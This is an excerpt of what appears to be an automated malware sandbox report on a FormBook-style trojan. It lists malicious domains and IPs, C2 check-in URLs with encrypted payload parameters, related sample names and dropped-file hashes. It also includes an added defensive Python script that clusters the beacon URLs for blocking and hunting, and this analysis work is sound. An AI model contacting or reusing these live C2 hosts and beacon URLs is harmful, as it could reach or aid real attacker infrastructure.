          http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          https://www.123-reg-new-domain.co.uk/iframe.html | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W | 100% | Avira URL Cloud | phishing

          Domains and IPs

          Contacted Domains

          Name                            | IP              | Active  | Malicious | Antivirus Detection | Reputation
          www.5xlsteve.com                | 94.136.40.51    | true    | true      |                     | unknown
          www.fredrika-stahl.com          | 185.53.177.12   | true    | true      |                     | unknown
          vallble01.xshoppy.shop          | 75.2.124.199    | true    | true      |                     | unknown
          www.grpsexportsandimports.com   | 52.74.134.26    | true    | false     |                     | unknown
          www.shenghui118.com             | 45.192.104.89   | true    | true      |                     | unknown
          doodstore.net                   | 67.199.248.12   | true    | true      |                     | unknown
          purpleqube.com                  | 119.81.95.146   | true    | true      |                     | unknown
          www.tori2020.com                | 222.239.248.209 | true    | true      |                     | unknown
          www.9wsc.com                    | 23.225.101.32   | true    | true      |                     | unknown
          mutanterestaurante.com          | 50.87.146.99    | true    | true      |                     | unknown
          motivactivewear.com             | 34.102.136.180  | true    | false     |                     | unknown
          oceancollaborative.com          | 184.168.131.241 | true    | true      |                     | unknown
          www.purpleqube.com              | unknown         | unknown | true      |                     | unknown
          www.motivactivewear.com         | unknown         | unknown | true      |                     | unknown
          www.reufhroir.com               | unknown         | unknown | true      |                     | unknown
          www.doodstore.net               | unknown         | unknown | true      |                     | unknown
          www.mutanterestaurante.com      | unknown         | unknown | true      |                     | unknown
          www.oceancollaborative.com      | unknown         | unknown | true      |                     | unknown
          www.underce.com                 | unknown         | unknown | true      |                     | unknown
          www.kocaelimanliftkiralama.site | unknown         | unknown | true      |                     | unknown
          www.kesat-ya10.com              | unknown         | unknown | true      |                     | unknown

                                                  Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W | true | Avira URL Cloud: safe | unknown
          http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W | true | Avira URL Cloud: safe | unknown
          http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W | true | Avira URL Cloud: safe | unknown
          http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W | true | Avira URL Cloud: safe | unknown
          http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W | false | Avira URL Cloud: safe | unknown
          www.oceancollaborative.com/bp3i/ | true | Avira URL Cloud: safe | low
          http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W | true | Avira URL Cloud: safe | unknown
          http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W | true | Avira URL Cloud: phishing | unknown
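Every check-in URL in the two tables above has the same shape: one path segment (`/bp3i/`), a first parameter carrying base64-like encrypted data, and a fixed trailing parameter (`ApZx=O2MHiVr0W`) that is identical across all hosts. FormBook's configuration holds a list of domains of which most are decoys, and the sandbox cannot tell the live C2 apart from the decoys, which is also why nearly all the URL reputation verdicts read "safe". The following added example (not part of the report) clusters the contacted URLs by path and trailing parameter to recover the campaign's host list, and lists the domains that were only resolved over DNS without a check-in. Its inputs are the URLs and explorer.exe domain queries from this report; the last two URLs are controls taken from the memory-strings table.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# A check-in payload is base64-like: alphanumerics plus '+' and '/', optional padding.
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_url(url):
    """Return (host, path, [(key, value), ...]) without decoding the query,
    so '+' and '/' inside the encrypted payload survive intact."""
    if "://" not in url:
        url = "http://" + url  # the report lists some URLs without a scheme
    parts = urlsplit(url)
    query = []
    for kv in parts.query.split("&"):
        if kv:
            key, _, value = kv.partition("=")
            query.append((key, value))
    return parts.hostname, parts.path, query


def cluster_c2_urls(urls):
    """Group URLs by (path, trailing key, trailing value), keeping only URLs whose
    first parameter looks like base64 payload and groups that span 2+ hosts."""
    groups = defaultdict(set)
    for url in urls:
        host, path, query = split_url(url)
        if len(query) < 2:
            continue
        payload = query[0][1]
        token_key, token_value = query[-1]
        if not B64ISH.match(payload):
            continue
        groups[(path, token_key, token_value)].add(host)
    return {key: sorted(hosts) for key, hosts in groups.items() if len(hosts) >= 2}


def beacon_summary(urls, queried_domains):
    """Pick the largest cluster and contrast it with DNS-only activity."""
    clusters = cluster_c2_urls(urls)
    if not clusters:
        return None
    (path, key, value), hosts = max(clusters.items(), key=lambda kv: len(kv[1]))
    return {
        "path": path,
        "token": (key, value),
        "checkin_hosts": hosts,
        "queried_without_checkin": sorted(set(queried_domains) - set(hosts)),
    }


# Contacted URLs from the report; the last two are unrelated controls.
REPORT_URLS = [
    "http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W",
    "http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W",
    "http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W",
    "http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W",
    "http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W",
    "http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W",
    "http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W",
    "www.oceancollaborative.com/bp3i/",
    "http://www.apache.org/licenses/LICENSE-2.0",
    "https://www.123-reg-new-domain.co.uk/iframe.html",
]

# Domains queried by the injected explorer.exe, from the report's "Domain query" lines.
REPORT_QUERIES = [
    "www.fredrika-stahl.com", "www.purpleqube.com", "www.motivactivewear.com",
    "www.reufhroir.com", "www.tori2020.com", "www.doodstore.net",
    "www.mutanterestaurante.com", "www.5xlsteve.com", "www.oceancollaborative.com",
    "www.9wsc.com", "www.underce.com", "www.kocaelimanliftkiralama.site",
]

if __name__ == "__main__":
    summary = beacon_summary(REPORT_URLS, REPORT_QUERIES)
    print("path:", summary["path"], "token:", "=".join(summary["token"]))
    print("check-in hosts:", ", ".join(summary["checkin_hosts"]))
    print("queried only:", ", ".join(summary["queried_without_checkin"]))
```

For blocking and hunting, use the whole cluster plus the DNS-only set rather than the one host a reputation service happened to flag, and key proxy searches on the path and trailing token pair instead of the domain, since the same pair recurs across the decoys and the live C2 while the domains rotate.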

                                                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | WXs8v9QuE7.exe | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | WXs8v9QuE7.exe | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.123-reg-new-domain.co.uk/iframe.html | cscript.exe, 00000012.00000002.496418412.0000000004F02000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.fonts.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                                                          Contacted IPs


                                                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.53.177.12 | www.fredrika-stahl.com | Germany | 61969 | TEAMINTERNET-ASDE | true
50.87.146.99 | mutanterestaurante.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
75.2.124.199 | vallble01.xshoppy.shop | United States | 16509 | AMAZON-02US | true
119.81.95.146 | purpleqube.com | Singapore | 36351 | SOFTLAYERUS | true
34.102.136.180 | motivactivewear.com | United States | 15169 | GOOGLEUS | false
184.168.131.241 | oceancollaborative.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
222.239.248.209 | www.tori2020.com | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true
94.136.40.51 | www.5xlsteve.com | United Kingdom | 20738 | GD-EMEA-DC-LD5GB | true
67.199.248.12 | doodstore.net | United States | 396982 | GOOGLE-PRIVATE-CLOUDUS | true
23.225.101.32 | www.9wsc.com | United States | 40065 | CNSERVERSUS | true

                                                                          General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 438542
Start date: 22.06.2021
Start time: 18:23:13
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: WXs8v9QuE7.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@9/3@16/10
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.1% (good quality ratio 25%)
• Quality average: 77%
• Quality standard deviation: 30.1%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 104.43.193.48, 23.211.6.115, 23.35.236.56, 20.50.102.62, 51.103.5.159, 80.67.82.211, 80.67.82.235, 20.54.104.15, 40.112.88.60, 20.54.7.98
• Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          No simulations

                                                                          Joe Sandbox View / Context

                                                                          IPs

Match | Associated Sample Name / URL | Detection | Context
185.53.177.12 | GLqbDRKePPp16Zr.exe | malicious | www.and.today/bmfb/?2djxG=Yts8sH50jFIPGpa&sXR8Etn=9xwymc/IefVChBT+ma92A3rgxQiTRi/TdoRkkKjN09Xdfg/XB5VmY2hWTlePB89GMbMj
185.53.177.12 | BBTNC09.exe | malicious | www.tateandlylefibres.com/5tsq/?UTdx-fG=SylDT7ZrX7TQRocqkeMXGoAHs2xP9/r0Sju7AmKOa5zuU38bBZ3YZtOXnY+mUIr66aeF&Ppd=Ib04qfqhozGpx8
185.53.177.12 | MR3Pv2KUUr.exe | malicious | www.tateandlylefibres.com/5tsq/?SzuPiJ=SylDT7ZrX7TQRocqkeMXGoAHs2xP9/r0Sju7AmKOa5zuU38bBZ3YZtOXnY+ML4b6+YWF&PR3=uTyXQJdhBZjx
185.53.177.12 | WEIR RFQ# BJW 98728973 .doc | malicious | www.angelblake.com/n76/?g8cd9d=XtYXT8aJ/I7dzjq74aEsWprbRn1CUJ/Umc1UTvzR1ksM9WHMn9AJ/m2jV7zd4j7Uba4VXw==&sBW=KzrD
50.87.146.99 | Tcopy.exe | malicious | www.mutanterestaurante.com/bp3i/?RrTH=EVFT8Bbpw4nhxZ&TBZ0=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpFCqLRJ63Xz2
50.87.146.99 | a8eC6O6okf.exe | malicious | www.mutanterestaurante.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpFCAUh56zV72
75.2.124.199 | Proforma Fatura INV60767894.PDF.exe | malicious | www.bailcally.com/grv/?-Z2dsl=K/iIPR0Q06c9d1licXoZlmrqS6XG50aqcWhEiEXfQJJEWl2INNWFJ9ZWWZ+SMmfWNYbb&2dz=o8e0E
75.2.124.199 | lbqFKoALqe.exe | malicious | www.colliapse.com/csv8/?8pHXLLhp=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUvY/hBQThw&hbs=CnehJPdp6XLP_rwP
75.2.124.199 | iPv5du05Bu.exe | malicious | www.ephwehemeral.com/8rg4/?alX=TXFDhzv0K60l&ExoHs=Spuz5MFTcH5hu0Eu8bPWX6w6kpRPV1e+2LvHjALXVfiJG6ly0exzQ74SWdynMJacHQIi
119.81.95.146 | fS5DVkL6jm.exe | malicious | www.purpleqube.com/bp3i/?jN9p20=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLx2UOrd9xL&0huPx=F6ptWX3peH
119.81.95.146 | 5t2CmTUhKc.exe | malicious | www.purpleqube.com/bp3i/?o6tTHHhh=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtbmnhqlSQaIYanfFQnQ==&3fuD_=S2MtYLGX0vFd
119.81.95.146 | a8eC6O6okf.exe | malicious | www.purpleqube.com/bp3i/?PF=5jiDaNi8a4RT0&V0Gp=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8EtblLbpk+rZ/5L

                                                                          Domains

Match | Associated Sample Name / URL | Detection | Context
vallble01.xshoppy.shop | fS5DVkL6jm.exe | malicious | 75.2.19.252
www.9wsc.com | gz7dLhKlSQ.exe | malicious | 23.225.101.32
www.grpsexportsandimports.com | Tcopy.exe | malicious | 52.74.134.26

                                                                          ASN

Match | Associated Sample Name / URL | Detection | Context
UNIFIEDLAYER-AS-1US | tender-1235416393.xlsm | malicious | 192.185.88.195
UNIFIEDLAYER-AS-1US | tender-1235416393.xlsm | malicious | 192.185.88.195
UNIFIEDLAYER-AS-1US | Order.exe | malicious | 108.167.183.94
UNIFIEDLAYER-AS-1US | Habib_Bank Payment Advice.doc__.rtf | malicious | 162.144.79.7
UNIFIEDLAYER-AS-1US | heoN5wnP2d.exe | malicious | 74.220.199.8
UNIFIEDLAYER-AS-1US | FidKy67SWO.exe | malicious | 192.254.185.252
UNIFIEDLAYER-AS-1US | RFQ-BCM 03122020.exe | malicious | 50.87.249.240
UNIFIEDLAYER-AS-1US | plan-1637276620.xlsm | malicious | 192.185.21.116
UNIFIEDLAYER-AS-1US | idea-1232922316.xlsb | malicious | 162.241.194.107
UNIFIEDLAYER-AS-1US | Orden de compra.exe | malicious | 192.185.0.218
UNIFIEDLAYER-AS-1US | Drawing.exe | malicious | 162.241.61.229
UNIFIEDLAYER-AS-1US | aim-1028486377.xlsb | malicious | 192.232.222.161
UNIFIEDLAYER-AS-1US | VM_5823_05_24_2-2.html | malicious | 162.214.148.174
UNIFIEDLAYER-AS-1US | KTOpmUzBlp.xls | malicious | 162.241.87.244
UNIFIEDLAYER-AS-1US | KTOpmUzBlp.xls | malicious | 162.241.61.218
UNIFIEDLAYER-AS-1US | KTOpmUzBlp.xls | malicious | 162.241.87.244
UNIFIEDLAYER-AS-1US | eHTLcWfhgv.exe | malicious | 74.220.199.8
UNIFIEDLAYER-AS-1US | Lebanon Khayat Trading Company.exe | malicious | 192.254.185.244
UNIFIEDLAYER-AS-1US | Purchase_Order.exe | malicious | 50.87.249.240
UNIFIEDLAYER-AS-1US | paw.exe | malicious | 192.185.20.31
TEAMINTERNET-ASDE | KBzeB23bE1.exe | malicious | 185.53.177.13
TEAMINTERNET-ASDE | xnuE49NGol.exe | malicious | 185.53.177.11
TEAMINTERNET-ASDE | aVzUZCHkko.exe | malicious | 185.53.177.11
TEAMINTERNET-ASDE | PO#310521.PDF.exe | malicious | 185.53.178.10
TEAMINTERNET-ASDE | Scanned Specification Catalogue 7464.exe | malicious | 185.53.177.52
TEAMINTERNET-ASDE | Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exe | malicious | 185.53.178.53
TEAMINTERNET-ASDE | $RAULIU9.exe | malicious | 185.53.177.31
TEAMINTERNET-ASDE | 350969bc_by_Libranalysis.exe | malicious | 185.53.177.53
TEAMINTERNET-ASDE | GLqbDRKePPp16Zr.exe | malicious | 185.53.177.12
TEAMINTERNET-ASDE | sample3.exe | malicious | 185.53.177.12
TEAMINTERNET-ASDE | RFQ-14042021 Guangzhou Haotian Equipment Technology Co., Ltd,pdf.exe | malicious | 185.53.178.11
TEAMINTERNET-ASDE | bd.exe | malicious | 185.53.178.30
TEAMINTERNET-ASDE | bee.exe | malicious | 185.53.178.30
TEAMINTERNET-ASDE | Require your Sales Ledger from 01-April-2020.exe | malicious | 185.53.179.90
TEAMINTERNET-ASDE | 52FFDD3BC0DE63EB8F6CD8A90373EAF3BCC37BB0804FC.exe | malicious | 185.53.177.71
                                                                          PO#560.zip.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.14
                                                                          safecrypt.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.54
                                                                          RFQ HAN4323.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.11
                                                                          Doc.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.14
                                                                          payment slip_pdf.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.10
                                                                          AMAZON-02USKCqjqClweR.exeGet hashmaliciousBrowse
                                                                          • 52.221.201.97
                                                                          RFQ 06-21.xlsxGet hashmaliciousBrowse
                                                                          • 3.35.217.223
                                                                          Ejima.exeGet hashmaliciousBrowse
                                                                          • 52.14.32.15
                                                                          PO 06-22.xlsxGet hashmaliciousBrowse
                                                                          • 3.35.217.223
                                                                          DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                          • 75.2.26.18
                                                                          New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                          • 13.59.53.244
                                                                          QUOTATION.ZIP.exeGet hashmaliciousBrowse
                                                                          • 76.223.26.96
                                                                          customer1.exeGet hashmaliciousBrowse
                                                                          • 18.185.153.48
                                                                          customer2.exeGet hashmaliciousBrowse
                                                                          • 52.29.138.39
                                                                          Swift advice Receipt.exeGet hashmaliciousBrowse
                                                                          • 52.58.78.16
                                                                          June 21st,2021.exeGet hashmaliciousBrowse
                                                                          • 13.59.53.244
                                                                          Payment update.exeGet hashmaliciousBrowse
                                                                          • 3.143.65.214
                                                                          8uswh8RLwO.exeGet hashmaliciousBrowse
                                                                          • 18.134.243.168
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 18.136.132.202
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 18.136.132.202
                                                                          eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                          • 99.83.154.118
                                                                          fS5DVkL6jm.exeGet hashmaliciousBrowse
                                                                          • 75.2.19.252
                                                                          xJP0w1Ze2J.apkGet hashmaliciousBrowse
                                                                          • 54.189.163.81
                                                                          SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                          • 13.225.75.73
                                                                          Arquivo archivo.htmlGet hashmaliciousBrowse
                                                                          • 13.224.195.125

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          Match: C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll
                                                                          Associated Sample Name / URL | Detection
                                                                          New Order.exe | malicious
                                                                          hesaphareketi-0.exe | malicious
                                                                          0FKzNO1g3P.exe | malicious
                                                                          mlzHNUHkUl.exe | malicious
                                                                          Ejima.exe | malicious
                                                                          UrgentNewOrder_pdf.exe | malicious
                                                                          Swift 001.exe | malicious
                                                                          DHL DOCUMENTS.exe | malicious
                                                                          DHL Shipment Documents.exe | malicious
                                                                          20210622-kll98374.exe | malicious
                                                                          SKMTC_STOMANAS_7464734648592848Ordengdoc.exe | malicious
                                                                          Orden de compra.exe | malicious
                                                                          Pending delivery - Final Attempt.exe | malicious
                                                                          2bni49vTpt.exe | malicious
                                                                          rJIeeo2B7Q.exe | malicious
                                                                          e-hesap bildirimi.exe | malicious
                                                                          Draft Booking Confirmation 062120297466471346.exe | malicious
                                                                          HalkbankEkstre0609202138711233847204.exe | malicious
                                                                          232.exe | malicious
                                                                          Yeni Siparis.exe | malicious

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\fy9bu4fvmp6z54he
                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):164863
                                                                                                                  Entropy (8bit):7.989487694845126
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:3mZiKhENRWASxlTdjg2PW5CuBa4aoiPywVqsWkukAgXN5W3Adsaq4pHAuo:gmol1rPW5CmaoC7WkukAgXLWTv4dlo
                                                                                                                  MD5:1B7604BC8F65C9852474C134A887600F
                                                                                                                  SHA1:D7ABB58249F1372260C8FC2B18ADDF50BE3FFC6F
                                                                                                                  SHA-256:97BF249F913024B346AC8BC57F0637E50FB1A7238C33BDCA79BCDD6AA68462B6
                                                                                                                  SHA-512:5927CE6017903CF9D9B770190634A7C66A8F2A4B0D797EA0AABF60EA2DFDDDEC99ED3A655B3F5A7D80920B193B29397304C4C5781907340BBD8B067D31BA61CF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: .....`.Q].......3..q.........)E/..^..ol.O...#.......+~=..../PAW,G..;q..63...8.">..i.F.W..g`"l..Z.S....Iq-.v.R....RD?..w.H. ..Fa.;s#|.U Of.c....5r...i(<4.-....."*=?.."{.y.w.....~R...C..).~.o..........X......B...).....8.r-7.`{.....q&.l(.*C.M..Z........`.Q]|.o.N..^3)q=.........)E/..^k.ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z.....Ls....~.6...7.)A..(..........p.....J..).......r-}.`{.....&./(.*{.M/.sZ........`.Q].$o.P..^3)qz.........)E/..^..ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z....w.....~.......)A..(..........p........).......r-}.`{.....&./(.*{.M/.sZ........`.Q].$o.P..^3)qz.........)E/..^..ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z....w.....~.......)A..(..........p........).......r-}.`
                                                                                                                  C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll
